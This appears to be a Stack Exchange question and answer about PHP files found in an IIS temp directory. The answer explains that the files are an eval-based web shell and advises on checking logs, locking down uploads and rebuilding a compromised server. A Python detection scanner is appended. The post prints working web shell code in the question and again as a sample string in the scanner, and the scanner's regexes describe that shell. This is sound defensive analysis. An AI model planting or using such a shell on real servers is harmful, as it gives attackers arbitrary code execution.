
I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp.

Looking into the contents, I find a number followed by some PHP code; the following code appears in several files:

    9990000
    <?php
    $mujj = $_POST['z'];
    if ($mujj != "") {
        $xsser = base64_decode($_POST['z0']);
        @eval("\$safedg = $xsser;");
    }
    ?>

This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.

Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?

I don't know if it is relevant, but we are running PHP 5.5 on IIS.

Mark_1
  • That filename reminds me of MSIE temp files – Robin Kanters Dec 01 '15 at 14:38
  • Probably they are uploaded to server by attacker, and if your `upload_tmp_dir` is pointing to your temp directory, it seems that someone is trying to upload malicious code to your server. These files are deleted after script execution. – Kristian Vitozev Dec 01 '15 at 14:45

1 Answer

Short story: your server may have already been compromised.

Those are PHP shells - mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute any arbitrary code on your server.

The key parts to understanding the shell are:

    $xsser = base64_decode($_POST['z0']);
    @eval("\$safedg = $xsser;");

It accepts any code at all from a $_POST variable, base64_decodes it, and then runs it through eval while suppressing any errors.

It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.

So what to do about it? Check your server logs - if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site, and lock them down (require user authentication, etc.), and then if you're certain that you're compromised, don't bother trying to clean it. Spin up a new server, migrate your clean code, important files, and data to the clean server.

samlev
  • I used to work for a development+hosting company, and we had to quarantine Joomla sites to their own server because every few weeks every site would end up with a copy of `c99.php` (or something similar). They get into one site, then spread to any other world-writable folder on the server, thus being able to act as any user that has a website. We eventually ran a cron that trampled world-writable folders - ugly, but it contained infections to just one site at a time. – samlev Dec 01 '15 at 15:02
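The answer suggests checking for these dropped shells rather than trusting that the temp folder is harmless. Below is an added detection example, written for this page and not part of the question or samlev's answer: a small Python scanner that walks one directory, reads the head of each file, and flags files that combine the traits of the shell shown above (a PHP open tag, a read from `$_POST`/`$_GET`, and a call to `eval`, optionally via `base64_decode`). The `phpXXXX.tmp` filename regex, the `make_sample_dir` helper and the sample files it writes are constructed for the demo; the shell body is the one quoted in the question, used only as a detection sample.

```python
import os
import re
import tempfile
from dataclasses import dataclass, field

# Indicator regexes, each paired with a label for the report. Any one of them
# alone is common in benign PHP; the combination in is_eval_shell() is what
# marks the one-line eval shell family from the question.
INDICATORS = [
    (re.compile(r"<\?php", re.I), "php_open_tag"),
    (re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I), "reads_request_input"),
    (re.compile(r"\bbase64_decode\s*\(", re.I), "base64_decode"),
    (re.compile(r"\beval\s*\(", re.I), "eval"),
    (re.compile(r"@\s*eval\s*\(", re.I), "error_suppressed_eval"),
]

# Assumption: PHP's upload temp files on Windows are named php + 4 hex digits
# + .tmp, as in the question's phpA3F9.tmp example.
TMP_NAME_RE = re.compile(r"^php[0-9A-Fa-f]{4}\.tmp$")


@dataclass
class Finding:
    name: str
    path: str
    indicators: list = field(default_factory=list)
    score: int = 0


def classify_content(data: str) -> list:
    """Return the label of every indicator regex that matches the file body."""
    return [label for rx, label in INDICATORS if rx.search(data)]


def is_eval_shell(labels) -> bool:
    """PHP tag + request input + eval together: the shell's defining shape."""
    return ("php_open_tag" in labels
            and "reads_request_input" in labels
            and "eval" in labels)


def scan_temp_dir(directory: str, max_bytes: int = 65536) -> list:
    """Scan one directory (no recursion) and return a Finding per file whose
    head matches the eval-shell shape. Files are decoded as latin-1 so that
    binary uploads (images, archives) never raise while being inspected."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            body = fh.read(max_bytes).decode("latin-1")
        labels = classify_content(body)
        if is_eval_shell(labels):
            finding = Finding(name=name, path=path, indicators=labels, score=len(labels))
            if TMP_NAME_RE.match(name):
                # Upload-handler naming plus shell content: the question's exact case.
                finding.indicators.append("php_upload_tmp_name")
                finding.score += 1
            findings.append(finding)
    return findings


# Constructed sample: the shell body quoted in the question, leading number included.
SHELL_SAMPLE = (
    "9990000\n<?php\n"
    "$mujj = $_POST['z']; if ($mujj!=\"\") { $xsser=base64_decode($_POST['z0']); "
    "@eval(\"\\$safedg = $xsser;\"); } ?>\n"
)


def make_sample_dir() -> str:
    """Create a throwaway directory with constructed files: one shell in a
    phpXXXX.tmp name, a binary-looking upload, a benign PHP file that uses
    base64_decode, and a benign PHP file that reads $_POST without eval."""
    d = tempfile.mkdtemp(prefix="tmpscan_")
    samples = {
        "phpA3F9.tmp": SHELL_SAMPLE.encode("utf-8"),
        "php1B2C.tmp": b"\xff\xd8\xff\xe0" + b"JFIF-like constructed bytes",
        "cache_helper.php": b"<?php echo base64_decode('aGk='); ?>\n",
        "contact.php": b"<?php $n = $_POST['name']; echo htmlspecialchars($n); ?>\n",
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    return d


def demo() -> list:
    """Build the sample directory and scan it; returns the findings list."""
    return scan_temp_dir(make_sample_dir())


if __name__ == "__main__":
    for f in demo():
        print(f"{f.name}: score={f.score} indicators={', '.join(f.indicators)}")
```

Run it against the real temp directory with `scan_temp_dir(r"C:\Windows\Temp")` (or whatever `upload_tmp_dir` points at); a hit there says a request delivered shell code as an upload, which is the cue to pull the matching POST from the IIS logs and review every upload form on the site, as the answer advises.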